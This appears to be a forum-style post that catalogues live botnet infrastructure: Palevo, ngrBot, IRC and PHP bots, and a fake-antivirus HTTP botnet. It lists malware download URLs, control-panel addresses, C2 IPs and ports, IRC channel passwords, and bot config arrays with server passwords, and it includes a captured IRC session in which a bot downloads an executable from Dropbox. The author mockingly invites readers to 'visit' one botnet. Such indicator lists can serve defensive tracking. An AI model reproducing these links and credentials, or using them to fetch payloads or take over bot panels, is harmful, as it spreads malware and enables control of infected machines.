HTTP malware spreading through networks, known as the Palevo worm
exe files: http://fa715921.urlbeat.net http://b7b0380e.goneviral.com
config file: http://04ed4837.tubeviral.com
Bot panel used to control zombies:
Download panel: http://cec3f665.ultrafiles.net http://8b47fd59.tinylinks.co
VirusTotal scan: 4/43 (9.3%) http://www.virustotal.com/file-scan/report.html?id=31cf7e82afe834189765aadb4d3b057c8a5bdbafd0236ac3717945de644ea134-1319067167
70.34.194.26 (100k ngrBotnet hosted in United States Canton Wbs4.me)
The guy behind this large net is an hf user and he's a very l33t hecker. Here is his monster net, now open for public visits lol. 8 leafs with probably 15k bots inside every leaf; I estimate it at around 100k bots.
server: 109.68.191.156 TCP port 1888
server: 109.68.191.159 TCP port 1888
server: 31.214.201.175 TCP port 1888
Server: ...
ng.albanianetwork.com (ngrBot hosted in Netherlands Amsterdam Ecatel Ltd)
Real heckers, and very hard to know where the lamers are from (look at the domain name).
ng.albanianetwork.com 89.248.168.87
api.wipmania.com api.wipmania.com 199.15.234.7
gn.albacrew.com 89.248.168.87
Download URLs
http://199.15.234.7/ (api.wipmania.com)
Outgoing connection to remote server: ng.albanianetwork.com TCP port 6869
Outgoing connection to remote server: api.wipmania.com TCP port 80
Outgoing connection to remote server: ng.albanianetwork.com TCP port 9731
Outgoing connection to ...
69.162.107.11 (unknown http malware hosted in United States Houston Limestone Networks Inc)
Panel picture:
Panel url: http://22079a17.urlbeat.net
exe file used to infect: http://d5243fd7.filesonthe.net
hosting info: http://whois.domaintools.com/69.162.107.11
safetysamvps.info (irc botnet hosted in United States Walnut Psychz Networks)
safetysamvps.info 199.119.201.232
Server: 199.119.201.232:6667
Server Password:
Username: Catalyst21
Nickname: n{DEU|XP-32}214249
Channel: #Catalyst (Password: )
Channeltopic: Now talking in #catalyst
Topic On: [ #catalyst ] [ IRC ]
Topic By: [ Execute ]
hosting info: http://whois.domaintools.com/199.119.201.232
api.trafficnum.net (irc botnet hosted in United States San Antonio Slicehost)
api.trafficnum.net 184.106.152.29
Server: 184.106.152.29:2345
Server Password:
Username: x
Nickname: n[DEU|XP]7983462
Channel: #!prbla! (Password: )
Channeltopic: :.m /125/125/85/84/52/33/11/110/108/114/59/118/70/112/100/115/112/96/55/69/127/100/42/54/28/33/17/63/48/51/
Topic By: [ spin ]
hosting info: http://whois.domaintools.com/184.106.152.29
88.13.254.233 (ngrBot hosted in Spain Telefonica De Espana)
Remote Host      Port Number
199.15.234.7     80
50.17.217.128    80
83.233.33.6      80
88.13.254.233    4242
PASS secret
PRIVMSG ##n :[DNS]: Blocked 1310 domain(s) - Redirected 0 domain(s)
NICK n{US|XPa}egiruwp
USER egiruwp 0 0 :egiruwp
PONG :ED4B405C
JOIN ##n secret
PRIVMSG ##n :[d="http://dl.dropbox.com/u/40789812/Comet1185501.exe" s="279040 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Scxaxs.exe" - Download retries: 0
hosting info: http://whois.domaintools.com/88.13.254.233
92.241.130.174 (vnloader hosted in Bosnia And Herzegovina Banja Luka Aneks D.o.o)
Panel here: http://92.241.130.174/vn/ http://92.241.130.174/vn/bot/
This malware is being sold on hecking boards.
screen of panel here:
hosting info: http://whois.domaintools.com/92.241.130.174
duffiduffid.ru (http botnet hosted in Bulgaria Sofia Bulgarian Telecommunications Company Plc)
This HTTP botnet is a very big one: a FAKE ANTIVIRUS which infects machines; they connect over HTTP to report infections or download files.
control panel here: http://www.duffiduffid.ru/stat/ http://www.duffiduffid.ru/stat/stat3.php
Resolved : [duffiduffid.ru] To [82.210.157.9]
Resolved : [duffiduffid.ru] To [113.161.87.176]
Resolved : [duffiduffid.ru] To [71.217.16.11]
Resolved : [duffiduffid.ru] To [60.19.30.135]
Resolved : [duffiduffid.ru] To [87.126.200.246]
hosting info: http://whois.domaintools.com/87.126.200.246
69.162.81.123 (linux bots hosted in United States Van Nuys Limestone Networks Inc)
var $config = array("server"=>"69.162.81.123", "port"=>2221, "pass"=>"lol1", "prefix"=>"[NkD]-", "maxrand"=>8, "chan"=>"#nkd", "key"=>"", "modes"=>"+iB-x", "password"=>"123", "trigger"=>".", "hostauth"=>"*"
var $config = array("server"=>"69.162.81.123", "port"=>2222, "pass"=>"mgn22", "prefix"=>"BOTN3T|", "maxrand"=>8, "chan"=>"#magno", "key"=>"", "modes"=>"+iB-x", "password"=>"soufoda", "trigger"=>".", "hostauth"=>"*"
hosting info: http://whois.domaintools.com/69.162.81.123